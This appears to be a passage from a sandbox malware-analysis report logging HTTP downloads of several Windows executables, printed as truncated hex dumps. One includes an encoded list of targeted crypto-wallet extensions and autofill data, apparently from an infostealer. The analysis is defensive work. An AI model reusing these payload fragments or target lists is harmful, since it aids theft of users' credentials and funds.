00 00 00 00 00 6c c7 03 00 78 00 00 00 00 90 04 00 1c f4 00 00 00 60 04 00 08 22 00 00 00 00 00 00 00 00 00 00 00 90 05 00 68 07 00 00 c0 9d 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 9c 03 00 40 01 00 00 00 00 00 00 00 00 00 00 00 b0 02 00 50 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 10 92 02 00 00 10 00 00 00 94 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 42 26 01 00 00 b0 02 00 00 28 01 00 00 98 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 d8 73 00 00 00 e0 03 00 00 0e 00 00 00 c0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 08 22 00 00 00 60 04 00 00 24 00 00 00 ce 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 1c f4 00 00 00 90 04 00 00 f6 00 00 00 f2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 07 00 00 00 90 05 00 00 08 00 00 00 e8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 13 Dec 2024 08:37:17 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Thu, 12 Dec 2024 10:50:51 GMTETag: "4b200-629107cd804d2"Accept-Ranges: bytesContent-Length: 307712Connection: closeContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 dc 48 28 d2 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 e4 02 00 00 cc 01 00 00 00 00 00 8e 02 03 00 00 20 00 00 00 20 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 05 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 3c 02 03 00 4f 00 00 00 00 20 03 00 c6 c9 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 94 e2 02 00 00 20 00 00 00 e4 02 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 c6 c9 01 00 00 20 03 00 00 ca 01 00 00 e6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 05 00 00 02 00 00 00 b0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 02 03 00 00 00 00 00 48 00 00 00 02 00 05 00 20 83 01 00 1c 7f 01 00 03 00 00 00 8f 02 00 06 28 77 01 00 f8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 61 00 75 00 74 00 6f 00 66 00 69 00 6c 00 6c 00 35 00 74 00 59 00 57 00 52 00 71 00 61 00 57 00 56 00 6f 00 61 00 6d 00 68 00 68 00 61 00 6d 00 4a 00 38 00 57 00 57 00 39 00 79 00 62 00 32 00 6c 00 58 00 59 00 57 00 78 00 73 00 5a 00 58 00 51 00 4b 00 61 00 57 00 4a 00 75 00 5a 00 57 00 70 00 6b 00 5a 00 6d 00 70 00 74 00 62 00 57 00 74 00 77 00 59 00 32 00 35 00 73 00 63 00 47 00 56 00 69 00 61 00 32 00 78 00 74 00 62 00 6d 00 74 00 76 00 5a 00 57 00 39 00 70 00 61 00 47 00 39 00 6d 00 5a 00 57 00 4e 00 38 00 56 00 48 00 4a 00 76 00 62 00 6d 00 78 00 70 00 62 00 6d 00 73 00 4b 00 61 00 6d 00 4a 00 6b 00 59 00 57 00 39 00 6a 00 62 00 6d 00 56 00 70 00 61 00 57 00 6c 00 75 00 62 00 57 00 70 00 69 00 61 00 6d 00 78 00 6e 00 59 00 57 00 78 00 6f 00 59 00 32 00 56 00 73 00 5a 00 32 00 4a 00 6c 00 61 00 6d 00 31 00 75 00 61 00 57 00 52 00 38 00 54 00 6d 00 6c 00 6d 00 64 00 48 00 6c 00 58 00 59 00 57 00 78 00 73 00
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 13 Dec 2024 08:37:19 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Thu, 12 Dec 2024 05:53:20 GMTETag: "4b400-6290c54e671ba"Accept-Ranges: bytesContent-Length: 308224Connection: closeContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 61 5c b7 69 25 3d d9 3a 25 3d d9 3a 25 3d d9 3a 2c 45 4a 3a 26 3d d9 3a 25 3d d8 3a 26 3d d9 3a 4a 4b 72 3a 2d 3d d9 3a 4a 4b 43 3a 24 3d d9 3a 4a 4b 44 3a 24 3d d9 3a 52 69 63 68 25 3d d9 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 3c 7a 5a 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0a 00 00 3a 00 00 00 2a 00 00 00 00 00 00 5c 34 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 00 05 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 68 00 00 28 00 00 00 00 90 00 00 28 03 00 00 00 80 00 00 40 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 cb 39 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c8 18 00 00 00 50 00 00 00 1a 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 88 06 00 00 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 40 02 00 00 00 80 00 00 00 04 00 00 00 58 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 28 03 00 00 00 90 00 00 00 04 00 00 00 5c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 78 36 34 00 00 00 00 00 60 04 00 00 a0 00 00 00 54 04 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 13 Dec 2024 08:37:22 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Thu, 12 Dec 2024 07:53:47 GMTETag: "6bc00-6290e03a93110"Accept-Ranges: bytesContent-Length: 441344Connection: closeContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 dd b6 42 53 99 d7 2c 00 99 d7 2c 00 99 d7 2c 00 8d bc 2f 01 94 d7 2c 00 8d bc 29 01 23 d7 2c 00 cb a2 28 01 8b d7 2c 00 cb a2 2f 01 8f d7 2c 00 cb a2 29 01 c0 d7 2c 00 a8 8b d1 00 9b d7 2c 00 8d bc 28 01 8e d7 2c 00 8d bc 2d 01 8a d7 2c 00 99 d7 2d 00 6a d7 2c 00 55 a2 25 01 98 d7 2c 00 55 a2 d3 00 98 d7 2c 00 55 a2 2e 01 98 d7 2c 00 52 69 63 68 99 d7 2c 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 8b 96 5a 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1d 00 fa 04 00 00 00 02 00 00 00 00 00 aa a6 02 00 00 10 00 00 00 10 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 07 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 46 06 00 c8 00 00 00 00 d0 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 06 00 d4 45 00 00 fc e1 05 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e3 05 00 18 00 00 00 38 e2 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 05 00 3c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 7a f8 04 00 00 10 00 00 00 fa 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 10 49 01 00 00 10 05 00 00 4a 01 00 00 fe 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 dc 6d 00 00 00 60 06 00 00 2c 00 00 00 48 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 d0 06 00 00 02 00 00 00 74 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d4 45 00 00 00 e0 06 00 00 46 00 00 00 76 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 13 Dec 2024 08:37:30 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Thu, 12 Dec 2024 18:53:38 GMTETag: "138c00-629173b693080"Accept-Ranges: bytesContent-Length: 1281024Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 86 e5 c9 44 c2 84 a7 17 c2 84 a7 17 c2 84 a7 17 d6 ef a3 16 d6 84 a7 17 d6 ef a4 16 d2 84 a7 17 d6 ef a2 16 73 84 a7 17 90 f1 a2 16 86 84 a7 17 90 f1 a3 16 cd 84 a7 17 90 f1 a4 16 c8 84 a7 17 d6 ef a6 16 cf 84 a7 17 c2 84 a6 17 01 84 a7 17 0e f1 ae 16 c6 84 a7 17 0e f1 a7 16 c3 84 a7 17 0e f1 58 17 c3 84 a7 17 0e f1 a5 16 c3 84 a7 17 52 69 63 68 c2 84 a7 17 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 82 96 5a 67 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0e 1d 00 c8 0f 00 00 38 04 00 00 00 00 00 c4 fa 0c 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 14 00 00 04 00 00 00 00 00 00 02 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 80 7e 12 00 58 00 00 00 d8 7e 12 00 8c 00 00 00 00 20 14 00 f8 00 00 00 00 60 13 00 9c ae 00 00 00 00 00 00 00 00 00 00 00 30 14 00 6c 12 00 00 00 95 11 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 95 11 00 38 01 00 00 00 00 00 00 00 00 00 00 00 e0 0f 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d0 c7 0f 00 00 10 00 00 00 c8 0f 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9e b3 02 00 00 e0 0f 00 00 b4 02 00 00 cc 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 8c bb 00 00 00 a0 12 00 00 44 00 00 00 80 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 9c ae 00 00 00 60 13 00 00 b0 00 00 00 c4 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 5f 52 44 41 54 41 00 00 fc 00 00 00 00 10 14 00 00 02 00 00 00 74 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 f8 00 00 00 00 20 14 00 00 02 00 00 00 76 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 6c 12 00 00 00 30 14 00 00 14 00 00 00 78 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 13 Dec 2024 08:37:35 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Thu, 12 Dec 2024 18:53:40 GMTETag: "1f000-629173b87b500"Accept-Ranges: bytesContent-Length: 126976Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c8 f9 ef 50 8c 98 81 03 8c 98 81 03 8c 98 81 03 98 f3 82 02 86 98 81 03 98 f3 84 02 05 98 81 03 98 f3 85 02 9e 98 81 03 de ed 85 02 83 98 81 03 de ed 82 02 9d 98 81 03 de ed 84 02 ad 98 81 03 98 f3 80 02 8b 98 81 03 8c 98 80 03 ed 98 81 03 40 ed 88 02 8f 98 81 03 40 ed 81 02 8d 98 81 03 40 ed 7e 03 8d 98 81 03 40 ed 83 02 8d 98 81 03 52 69 63 68 8c 98 81 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 84 96 5a 67 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 1d 00 44 01 00 00 b4 00 00 00 00 00 00 62 70 00 00 00 10 00 00 00 60 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 02 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 cd 01 00 9c 00 00 00 ac cd 01 00 50 00 00 00 00 00 02 00 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 02 00 f8 1a 00 00 84 bb 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 bb 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 60 01 00 4c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 06 43 01 00 00 10 00 00 00 44 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 2a 75 00 00 00 60 01 00 00 76 00 00 00 48 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 ec 1f 00 00 00 e0 01 00 00 14 00 00 00 be 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 00 00 00 00 00 02 00 00 02 00 00 00 d2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f8 1a 00 00 00 10 02 00 00 1c 00 00 00 d4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 13 Dec 2024 08:37:46 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Thu, 12 Dec 2024 05:53:20 GMTETag: "4b400-6290c54e671ba"Accept-Ranges: bytesContent-Length: 308224Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 61 5c b7 69 25 3d d9 3a 25 3d d9 3a 25 3d d9 3a 2c 45 4a 3a 26 3d d9 3a 25 3d d8 3a 26 3d d9 3a 4a 4b 72 3a 2d 3d d9 3a 4a 4b 43 3a 24 3d d9 3a 4a 4b 44 3a 24 3d d9 3a 52 69 63 68 25 3d d9 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 3c 7a 5a 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0a 00 00 3a 00 00 00 2a 00 00 00 00 00 00 5c 34 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 00 05 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 68 00 00 28 00 00 00 00 90 00 00 28 03 00 00 00 80 00 00 40 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 cb 39 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c8 18 00 00 00 50 00 00 00 1a 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 88 06 00 00 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 40 02 00 00 00 80 00 00 00 04 00 00 00 58 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 28 03 00 00 00 90 00 00 00 04 00 00 00 5c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 78 36 34 00 00 00 00 00 60 04 00 00 a0 00 00 00 54 04 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 13 Dec 2024 08:38:00 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Thu, 12 Dec 2024 10:50:51 GMTETag: "4b200-629107cd804d2"Accept-Ranges: bytesContent-Length: 307712Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 dc 48 28 d2 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 e4 02 00 00 cc 01 00 00 00 00 00 8e 02 03 00 00 20 00 00 00 20 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 05 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 3c 02 03 00 4f 00 00 00 00 20 03 00 c6 c9 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 94 e2 02 00 00 20 00 00 00 e4 02 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 c6 c9 01 00 00 20 03 00 00 ca 01 00 00 e6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 05 00 00 02 00 00 00 b0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 02 03 00 00 00 00 00 48 00 00 00 02 00 05 00 20 83 01 00 1c 7f 01 00 03 00 00 00 8f 02 00 06 28 77 01 00 f8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 